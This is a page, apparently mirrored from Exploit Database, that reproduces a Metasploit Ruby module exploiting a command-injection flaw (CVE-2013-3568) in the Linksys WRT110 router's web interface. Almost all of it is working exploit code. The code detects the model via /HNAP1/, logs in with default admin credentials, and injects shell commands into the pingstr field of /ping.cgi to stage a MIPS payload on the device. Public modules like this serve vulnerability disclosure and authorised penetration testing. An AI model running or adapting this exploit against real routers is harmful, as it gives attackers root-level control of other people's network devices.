Linksys WRT110 – Remote Command Execution (Metasploit)

• Exploit Database
• 51 阅读

• 作者： Metasploit
  日期： 2013-09-23
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/28484/

• ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # web site for more information on licensing and terms of use.
  # http://metasploit.com/
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStagerEcho
  
  def initialize(info = {})
  super(update_info(info,
  'Name'=> 'Linksys WRT110 Remote Command Execution',
  'Description' => %q{
  The Linksys WRT110 consumer router is vulnerable to a command injection
  exploit in the ping field of the web interface.
  },
  'Author'=>
  [
  'Craig Young', # Vulnerability discovery
  'joev <jvennix[at]rapid7.com>', # msf module
  'juan vazquez' # module help + echo cmd stager
  ],
  'License' => MSF_LICENSE,
  'References'=>
  [
  ['CVE', '2013-3568'],
  ['BID', '61151'],
  ['URL', 'http://seclists.org/bugtraq/2013/Jul/78']
  ],
  'DisclosureDate' => 'Jul 12 2013',
  'Privileged' => true,
  'Platform' => ['linux'],
  'Arch' => ARCH_MIPSLE,
  'Targets'=>
  [
  ['Linux mipsel Payload', { } ]
  ],
  'DefaultTarget'=> 0,
  ))
  
  register_options([
  OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']),
  OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),
  OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),
  OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])
  ], self.class)
  
  end
  
  def check
  begin
  res = send_request_cgi({
  'uri' => '/HNAP1/'
  })
  rescue ::Rex::ConnectionError
  return Exploit::CheckCode::Safe
  end
  
  if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\/ModelName>/
  return Exploit::CheckCode::Vulnerable
  end
  
  return Exploit::CheckCode::Safe
  end
  
  def exploit
  test_login!
  
  execute_cmdstager
  end
  
  # Sends an HTTP request with authorization header to the router
  # Raises an exception unless the login is successful
  def test_login!
  print_status("#{rhost}:#{rport} - Trying to login with #{user}:#{pass}")
  
  res = send_auth_request_cgi({
  'uri' => '/',
  'method' => 'GET'
  })
  
  if not res or res.code == 401 or res.code == 404
  fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Could not login with #{user}:#{pass}")
  else
  print_good("#{rhost}:#{rport} - Successful login #{user}:#{pass}")
  end
  end
  
  # Run the command on the router
  def execute_command(cmd, opts)
  send_auth_request_cgi({
  'uri' => '/ping.cgi',
  'method' => 'POST',
  'vars_post' => {
   'pingstr' => '& ' + cmd
  }
  })
  
  Rex.sleep(1) # Give the device a second
  end
  
  # Helper methods
  def user; datastore['USERNAME']; end
  def pass; datastore['PASSWORD'] || ''; end
  
  def send_auth_request_cgi(opts={}, timeout=nil)
  timeout ||= datastore['TIMEOUT']
  opts.merge!('authorization' => basic_auth(user, pass))
  begin
  send_request_cgi(opts, timeout)
  rescue ::Rex::ConnectionError
  fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
  end
  end
  end